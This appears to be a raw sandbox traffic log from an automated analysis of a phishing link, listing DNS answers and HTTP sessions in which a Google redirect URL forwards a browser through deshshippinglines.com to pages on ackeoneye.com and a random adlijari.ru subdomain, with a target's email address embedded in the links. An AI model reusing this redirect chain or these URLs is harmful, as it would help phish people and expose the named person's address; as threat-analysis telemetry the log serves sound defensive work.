                                                                                                                                  Jan 27, 2025 15:44:56.675442934 CET1.1.1.1192.168.2.50x7297No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:56.675587893 CET1.1.1.1192.168.2.50x5e21No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.401218891 CET1.1.1.1192.168.2.50x1ba3No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.401431084 CET1.1.1.1192.168.2.50x6eadNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.401431084 CET1.1.1.1192.168.2.50x6eadNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.449001074 CET1.1.1.1192.168.2.50x8602No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.449001074 CET1.1.1.1192.168.2.50x8602No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.449001074 CET1.1.1.1192.168.2.50x8602No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:57.449001074 CET1.1.1.1192.168.2.50x8602No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.161046028 CET1.1.1.1192.168.2.50x9e8aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.161180019 CET1.1.1.1192.168.2.50xfbddNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.161180019 CET1.1.1.1192.168.2.50xfbddNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:44:58.297892094 CET1.1.1.1192.168.2.50x5ff1No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:09.703608036 CET1.1.1.1192.168.2.50xb1acNo error (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:09.867923975 CET1.1.1.1192.168.2.50xd939No error (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:09.867923975 CET1.1.1.1192.168.2.50xd939No error (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.450412035 CET1.1.1.1192.168.2.50x81f9No error (0)www.amazon.comtp.47cf2c8c9-frontier.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.450412035 CET1.1.1.1192.168.2.50x81f9No error (0)tp.47cf2c8c9-frontier.amazon.comd3ag4hukkh62yn.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.450412035 CET1.1.1.1192.168.2.50x81f9No error (0)d3ag4hukkh62yn.cloudfront.net99.86.8.42A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.451467037 CET1.1.1.1192.168.2.50x9f03No error (0)www.amazon.comtp.47cf2c8c9-frontier.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.451467037 CET1.1.1.1192.168.2.50x9f03No error (0)tp.47cf2c8c9-frontier.amazon.comwww.amazon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.451467037 CET1.1.1.1192.168.2.50x9f03No error (0)www.amazon.com.edgekey.nete15316.dsca.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.491684914 CET1.1.1.1192.168.2.50x6235No error (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru65IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.493495941 CET1.1.1.1192.168.2.50x1c33No error (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:11.493495941 CET1.1.1.1192.168.2.50x1c33No error (0)v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.621118069 CET1.1.1.1192.168.2.50x85d1No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.621118069 CET1.1.1.1192.168.2.50x85d1No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.621118069 CET1.1.1.1192.168.2.50x85d1No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.621118069 CET1.1.1.1192.168.2.50x85d1No error (0)c.media-amazon.com108.138.16.195A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.621907949 CET1.1.1.1192.168.2.50x29edNo error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.621907949 CET1.1.1.1192.168.2.50x29edNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:12.621907949 CET1.1.1.1192.168.2.50x29edNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.688834906 CET1.1.1.1192.168.2.50x6986No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.688834906 CET1.1.1.1192.168.2.50x6986No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.688834906 CET1.1.1.1192.168.2.50x6986No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.688834906 CET1.1.1.1192.168.2.50x6986No error (0)c.media-amazon.com18.66.143.128A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.689766884 CET1.1.1.1192.168.2.50xa0eNo error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.689766884 CET1.1.1.1192.168.2.50xa0eNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.689766884 CET1.1.1.1192.168.2.50xa0eNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)fls-na.amazon.comgateway.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)gateway.prod.us-east-1.forester.a2z.comendpoint.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com18.204.152.18A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com3.210.209.8A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com54.165.227.56A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com54.164.250.201A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com3.210.29.18A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com50.19.47.22A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com52.72.244.149A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982285976 CET1.1.1.1192.168.2.50x962fNo error (0)endpoint.prod.us-east-1.forester.a2z.com52.54.124.182A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982302904 CET1.1.1.1192.168.2.50xf717No error (0)fls-na.amazon.comgateway.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:13.982302904 CET1.1.1.1192.168.2.50xf717No error (0)gateway.prod.us-east-1.forester.a2z.comendpoint.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)fls-na.amazon.comgateway.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)gateway.prod.us-east-1.forester.a2z.comendpoint.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com54.88.216.125A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com52.72.213.93A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com3.221.178.86A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com52.45.143.101A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com34.206.166.33A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com54.226.18.169A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com54.197.59.96A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689100981 CET1.1.1.1192.168.2.50x35a3No error (0)endpoint.prod.us-east-1.forester.a2z.com54.83.162.54A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689210892 CET1.1.1.1192.168.2.50xcfbeNo error (0)fls-na.amazon.comgateway.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:14.689210892 CET1.1.1.1192.168.2.50xcfbeNo error (0)gateway.prod.us-east-1.forester.a2z.comendpoint.prod.us-east-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:17.455564976 CET1.1.1.1192.168.2.50x25f7No error (0)www.amazon.comtp.47cf2c8c9-frontier.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:17.455564976 CET1.1.1.1192.168.2.50x25f7No error (0)tp.47cf2c8c9-frontier.amazon.comd3ag4hukkh62yn.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:17.458669901 CET1.1.1.1192.168.2.50x2a12No error (0)www.amazon.comtp.47cf2c8c9-frontier.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:17.458669901 CET1.1.1.1192.168.2.50x2a12No error (0)tp.47cf2c8c9-frontier.amazon.comwww-amazon-com.customer.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:17.458669901 CET1.1.1.1192.168.2.50x2a12No error (0)www-amazon-com.customer.fastly.net162.219.225.118A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:50.820003033 CET1.1.1.1192.168.2.50x2cedNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                  Jan 27, 2025 15:45:50.820044994 CET1.1.1.1192.168.2.50xe293No error (0)www.google.com65IN (0x0001)false
                                                                                                                                  • www.google.pn
                                                                                                                                  • deshshippinglines.com
                                                                                                                                  • https:
                                                                                                                                    • y3.ackeoneye.com
                                                                                                                                    • code.jquery.com
                                                                                                                                    • cdnjs.cloudflare.com
                                                                                                                                    • challenges.cloudflare.com
                                                                                                                                    • v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru
                                                                                                                                    • www.amazon.com
                                                                                                                                    • images-na.ssl-images-amazon.com
                                                                                                                                    • fls-na.amazon.com
                                                                                                                                  • a.nel.cloudflare.com
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.549714216.58.212.1314433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:53 UTC1027OUTGET /url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw== HTTP/1.1
                                                                                                                                  Host: www.google.pn
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:53 UTC1100INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.google.pn/amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==
                                                                                                                                  Cache-Control: private
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-F9wCrmGC8P4XDqNdREjtAw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:53 GMT
                                                                                                                                  Server: gws
                                                                                                                                  Content-Length: 329
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  Set-Cookie: NID=521=eaKUt4_VYblpua5krG8wmy1OZ5I5vsoT1b7F2wjwFPHLm1V0z6pfoZ1JkTGbufe1ZlRTxjRyhYJr4mxJwA4YTouHqmyoKRzyyeMXCgrRvbhtQ62uvjHr919YE0vFiXJuBc_edxPmZ2-22xe0eSUMVMRz1JjvJz0KFwctPLdGJ0ApJ2JYxJMGSAm6hrWvly6WSL9z_N2Y85j6SA; expires=Tue, 29-Jul-2025 14:44:53 GMT; path=/; domain=.google.pn; Secure; HttpOnly; SameSite=none
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close
                                                                                                                                  2025-01-27 14:44:53 UTC290INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 70 6e 2f 61 6d 70 2f 73 2f 64 65 73 68 73 68 69 70 70 69 6e 67 6c 69 6e 65 73 2e 63 6f 6d 2f 64 65 6d 6f 2f 6d 6f 64 65 2f 49 4a 75 6c 4b 6b 62 68 44 52 6f 43 65 59 6b 73 53 58 36 32 77 68 6e 75 63 4e 48
                                                                                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.pn/amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNH
                                                                                                                                  2025-01-27 14:44:53 UTC39INData Raw: 5a 76 62 43 35 6c 63 77 3d 3d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                  Data Ascii: ZvbC5lcw==">here</A>.</BODY></HTML>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.549713216.58.212.1314433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:53 UTC1135OUTGET /amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw== HTTP/1.1
                                                                                                                                  Host: www.google.pn
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: NID=521=eaKUt4_VYblpua5krG8wmy1OZ5I5vsoT1b7F2wjwFPHLm1V0z6pfoZ1JkTGbufe1ZlRTxjRyhYJr4mxJwA4YTouHqmyoKRzyyeMXCgrRvbhtQ62uvjHr919YE0vFiXJuBc_edxPmZ2-22xe0eSUMVMRz1JjvJz0KFwctPLdGJ0ApJ2JYxJMGSAm6hrWvly6WSL9z_N2Y85j6SA
                                                                                                                                  2025-01-27 14:44:53 UTC881INHTTP/1.1 302 Found
                                                                                                                                  Location: https://deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==
                                                                                                                                  Cache-Control: private
                                                                                                                                  X-Robots-Tag: noindex
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Ki3iKDa1pDeW0EhDQ7xLdw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:53 GMT
                                                                                                                                  Server: gws
                                                                                                                                  Content-Length: 309
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close
                                                                                                                                  2025-01-27 14:44:53 UTC309INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 65 73 68 73 68 69 70 70 69 6e 67 6c 69 6e 65 73 2e 63 6f 6d 2f 64 65 6d 6f 2f 6d 6f 64 65 2f 49 4a 75 6c 4b 6b 62 68 44 52 6f 43 65 59 6b 73 53 58 36 32 77 68 6e 75 63 4e 48 68 50 61 76 72 64 36 36 48 70 54 55 2f 5a 32 39 79 61 32 45
                                                                                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2E


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.549716199.168.185.2324433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:54 UTC746OUTGET /demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw== HTTP/1.1
                                                                                                                                  Host: deshshippinglines.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:54 UTC256INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:54 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  refresh: 0;url=https://y3.ackeoneye.com/lo92/#Xgorka.jimenez@devol.es
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  2025-01-27 14:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.549717199.168.185.2324433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:55 UTC680OUTGET /favicon.ico HTTP/1.1
                                                                                                                                  Host: deshshippinglines.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:55 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:55 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 315
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
